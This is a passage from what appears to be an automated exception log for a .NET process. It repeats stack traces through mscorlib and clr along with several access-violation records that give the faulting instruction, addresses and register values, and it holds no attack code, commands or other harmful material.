mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xd251be
0xd25037
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xb0fcd8
0xb0f7a8
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xb013e4
0xb00db4
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf

exception.instruction_r: 39 09 e8 2d 63 0a 6d 89 45 bc 8b 55 bc b9 b0 af
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xd2a804
registers.esp: 86498404
registers.edi: 86502864
registers.eax: 0
registers.ebp: 86502872
registers.edx: 43331156
registers.ebx: 43004700
registers.esi: 44386720
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xd2ad75
0xd255af
0xd25377
0xd2524d
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xd251be
0xd25037
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xb0fcd8
0xb0f7a8
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xb013e4
0xb00db4
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf

exception.instruction_r: 39 09 e8 a0 63 0a 6d 89 45 c8 83 7d c8 00 74 1f
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xd2a791
registers.esp: 86502820
registers.edi: 86502884
registers.eax: 0
registers.ebp: 86502892
registers.edx: 43331156
registers.ebx: 43004700
registers.esi: 44386720
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xd2ad75
0xd255af
0xd25377
0xd2524d
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xd251be
0xd25037
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xb0fcd8
0xb0f7a8
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xb013e4
0xb00db4
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf

exception.instruction_r: 39 09 e8 2d 63 0a 6d 89 45 bc 8b 55 bc b9 b0 af
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xd2a804
registers.esp: 86498420
registers.edi: 86502884
registers.eax: 0
registers.ebp: 86502892
registers.edx: 43331156
registers.ebx: 43004700
registers.esi: 44386720
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xd25523
0xd25377
0xd2c667
0xd2c616
mscorlib+0x32de48 @ 0x6de8de48
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x32dd91 @ 0x6de8dd91
mscorlib+0x32dc4c @ 0x6de8dc4c
mscorlib+0x32db05 @ 0x6de8db05
mscorlib+0x32d9c8 @ 0x6de8d9c8
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4825c CorDllMainForThunk-0x4429f clr+0x10d2d5 @ 0x6ed0d2d5
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x48208 CorDllMainForThunk-0x442f3 clr+0x10d281 @ 0x6ed0d281
DllGetClassObjectInternal+0x48159 CorDllMainForThunk-0x443a2 clr+0x10d1d2 @ 0x6ed0d1d2
DllGetClassObjectInternal+0x47f09 CorDllMainForThunk-0x445f2 clr+0x10cf82 @ 0x6ed0cf82
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 e8 a0 63 0a 6d 89 45 c8 83 7d c8 00 74 1f
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xd2a791
registers.esp: 108261512
registers.edi: 108261576
registers.eax: 0
registers.ebp: 108261584
registers.edx: 43331156
registers.ebx: 43781120
registers.esi: 43293608
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xd25523
0xd25377
0xd2c667
0xd2c616
mscorlib+0x32de48 @ 0x6de8de48
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x32dd91 @ 0x6de8dd91
mscorlib+0x32dc4c @ 0x6de8dc4c
mscorlib+0x32db05 @ 0x6de8db05
mscorlib+0x32d9c8 @ 0x6de8d9c8
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4825c CorDllMainForThunk-0x4429f clr+0x10d2d5 @ 0x6ed0d2d5
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x48208 CorDllMainForThunk-0x442f3 clr+0x10d281 @ 0x6ed0d281
DllGetClassObjectInternal+0x48159 CorDllMainForThunk-0x443a2 clr+0x10d1d2 @ 0x6ed0d1d2
DllGetClassObjectInternal+0x47f09 CorDllMainForThunk-0x445f2 clr+0x10cf82 @ 0x6ed0cf82
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 e8 2d 63 0a 6d 89 45 bc 8b 55 bc b9 b0 af
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xd2a804
registers.esp: 108257116
registers.edi: 108261576
registers.eax: 0
registers.ebp: 108261584
registers.edx: 43331156
registers.ebx: 43781120
registers.esi: 43293608
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xd25546
0xd25377
0xd2c667
0xd2c616
mscorlib+0x32de48 @ 0x6de8de48
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x32dd91 @ 0x6de8dd91
mscorlib+0x32dc4c @ 0x6de8dc4c
mscorlib+0x32db05 @ 0x6de8db05
mscorlib+0x32d9c8 @ 0x6de8d9c8
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4825c CorDllMainForThunk-0x4429f clr+0x10d2d5 @ 0x6ed0d2d5
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x48208 CorDllMainForThunk-0x442f3 clr+0x10d281 @ 0x6ed0d281
DllGetClassObjectInternal+0x48159 CorDllMainForThunk-0x443a2 clr+0x10d1d2 @ 0x6ed0d1d2
DllGetClassObjectInternal+0x47f09 CorDllMainForThunk-0x445f2 clr+0x10cf82 @ 0x6ed0cf82
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 e8 60 62 0a 6d 89 45 c8 83 7d c8 00 74 1f
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xd2a8d1
registers.esp: 108261512
registers.edi: 108261576
registers.eax: 0
registers.ebp: 108261584
registers.edx: 43379304
registers.ebx: 43781120
registers.esi: 43293608
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xd25546
0xd25377
0xd2c667
0xd2c616
mscorlib+0x32de48 @ 0x6de8de48
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x32dd91 @ 0x6de8dd91
mscorlib+0x32dc4c @ 0x6de8dc4c
mscorlib+0x32db05 @ 0x6de8db05
mscorlib+0x32d9c8 @ 0x6de8d9c8
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4825c CorDllMainForThunk-0x4429f clr+0x10d2d5 @ 0x6ed0d2d5
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x48208 CorDllMainForThunk-0x442f3 clr+0x10d281 @ 0x6ed0d281
DllGetClassObjectInternal+0x48159 CorDllMainForThunk-0x443a2 clr+0x10d1d2 @ 0x6ed0d1d2
DllGetClassObjectInternal+0x47f09 CorDllMainForThunk-0x445f2 clr+0x10cf82 @ 0x6ed0cf82
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 e8 ed 61 0a 6d 89 45 bc 8b 55 bc b9 b0 af
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xd2a944
registers.esp: 108257116
registers.edi: 108261576
registers.eax: 0
registers.ebp: 108261584
registers.edx: 43379304
registers.ebx: 43781120
registers.esi: 43293608
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xd25569
0xd25377
0xd2c667
0xd2c616
mscorlib+0x32de48 @ 0x6de8de48
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x32dd91 @ 0x6de8dd91
mscorlib+0x32dc4c @ 0x6de8dc4c
mscorlib+0x32db05 @ 0x6de8db05
mscorlib+0x32d9c8 @ 0x6de8d9c8
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4825c CorDllMainForThunk-0x4429f clr+0x10d2d5 @ 0x6ed0d2d5
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x48208 CorDllMainForThunk-0x442f3 clr+0x10d281 @ 0x6ed0d281
DllGetClassObjectInternal+0x48159 CorDllMainForThunk-0x443a2 clr+0x10d1d2 @ 0x6ed0d1d2
DllGetClassObjectInternal+0x47f09 CorDllMainForThunk-0x445f2 clr+0x10cf82 @ 0x6ed0cf82
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 e8 20 61 0a 6d 89 45 c8 83 7d c8 00 74 1f
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xd2aa11
registers.esp: 108261512
registers.edi: 108261576
registers.eax: 0
registers.ebp: 108261584
registers.edx: 43379776
registers.ebx: 43781120
registers.esi: 43293608
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xd25569
0xd25377
0xd2c667
0xd2c616
mscorlib+0x32de48 @ 0x6de8de48
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x32dd91 @ 0x6de8dd91
mscorlib+0x32dc4c @ 0x6de8dc4c
mscorlib+0x32db05 @ 0x6de8db05
mscorlib+0x32d9c8 @ 0x6de8d9c8
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4825c CorDllMainForThunk-0x4429f clr+0x10d2d5 @ 0x6ed0d2d5
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x48208 CorDllMainForThunk-0x442f3 clr+0x10d281 @ 0x6ed0d281
DllGetClassObjectInternal+0x48159 CorDllMainForThunk-0x443a2 clr+0x10d1d2 @ 0x6ed0d1d2
DllGetClassObjectInternal+0x47f09 CorDllMainForThunk-0x445f2 clr+0x10cf82 @ 0x6ed0cf82
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 e8 ad 60 0a 6d 89 45 bc 8b 55 bc b9 b0 af
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xd2aa84
registers.esp: 108257116
registers.edi: 108261576
registers.eax: 0
registers.ebp: 108261584
registers.edx: 43379776
registers.ebx: 43781120
registers.esi: 43293608
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xd2ab3d
0xd2558c
0xd25377
0xd2c667
0xd2c616
mscorlib+0x32de48 @ 0x6de8de48
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x32dd91 @ 0x6de8dd91
mscorlib+0x32dc4c @ 0x6de8dc4c
mscorlib+0x32db05 @ 0x6de8db05
mscorlib+0x32d9c8 @ 0x6de8d9c8
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4825c CorDllMainForThunk-0x4429f clr+0x10d2d5 @ 0x6ed0d2d5
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x48208 CorDllMainForThunk-0x442f3 clr+0x10d281 @ 0x6ed0d281
DllGetClassObjectInternal+0x48159 CorDllMainForThunk-0x443a2 clr+0x10d1d2 @ 0x6ed0d1d2
DllGetClassObjectInternal+0x47f09 CorDllMainForThunk-0x445f2 clr+0x10cf82 @ 0x6ed0cf82
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 e8 20 61 0a 6d 89 45 c8 83 7d c8 00 74 1f
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xd2aa11
registers.esp: 108261396
registers.edi: 108261460
registers.eax: 0
registers.ebp: 108261468
registers.edx: 43379776
registers.ebx: 43781120
registers.esi: 43293608
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xd2ab3d
0xd2558c
0xd25377
0xd2c667
0xd2c616
mscorlib+0x32de48 @ 0x6de8de48
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x32dd91 @ 0x6de8dd91
mscorlib+0x32dc4c @ 0x6de8dc4c
mscorlib+0x32db05 @ 0x6de8db05
mscorlib+0x32d9c8 @ 0x6de8d9c8
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4825c CorDllMainForThunk-0x4429f clr+0x10d2d5 @ 0x6ed0d2d5
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
